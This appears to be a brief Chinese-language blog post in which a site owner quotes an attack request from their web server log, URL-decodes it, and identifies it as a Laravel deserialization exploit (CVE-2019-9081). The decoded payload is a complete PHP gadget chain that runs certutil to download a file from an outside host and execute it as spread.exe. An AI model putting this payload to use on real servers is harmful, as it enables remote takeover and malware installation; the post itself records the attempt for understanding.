截出其中一段:
111.77.202.174 - - [12/Jul/2024:22:34:44 +0800] "GET /public/index.php/index?code=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A2%3A%22cmd.exe+%2Fc+certutil+-urlcache+-split+-f+http%3A%2F%2F2.2.2.1%3A19490%2Fspread.txt+C%3A%5CProgramData%5Cspread.exe+%26%26+C%3A%5CProgramData%5Cspread.exe%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7D HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1"
轉碼後得到:
/public/index.php/index?code=O:44:"Illuminate\Foundation\Testing\PendingCommand":4:{s:10:"*command";s:6:"system";s:13:"*parameters";a:1:{i:0;s:2:"cmd.exe /c certutil -urlcache -split -f http://2.2.2.1:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe";}s:6:"*app";O:33:"Illuminate\Foundation\Application":2:{s:22:"*hasBeenBootstrapped";b:0;s:11:"*bindings";a:1:{s:35:"Illuminate\Contracts\Console\Kernel";a:1:{s:8:"concrete";s:33:"Illuminate\Foundation\Application";}}}s:4:"test";O:27:"Illuminate\Auth\GenericUser":1:{s:13:"*attributes";a:2:{s:14:"expectedOutput";a:1:{i:0;s:1:"1";}s:17:"expectedQuestions";a:1:{i:0;s:1:"1";}}}}
查詢了一下只知道是一個 Laravel反序列化漏洞(CVE-2019-9081), 具有 DDos攻擊及劫持主機挖礦的功能? 說明不多
沒有留言:
張貼留言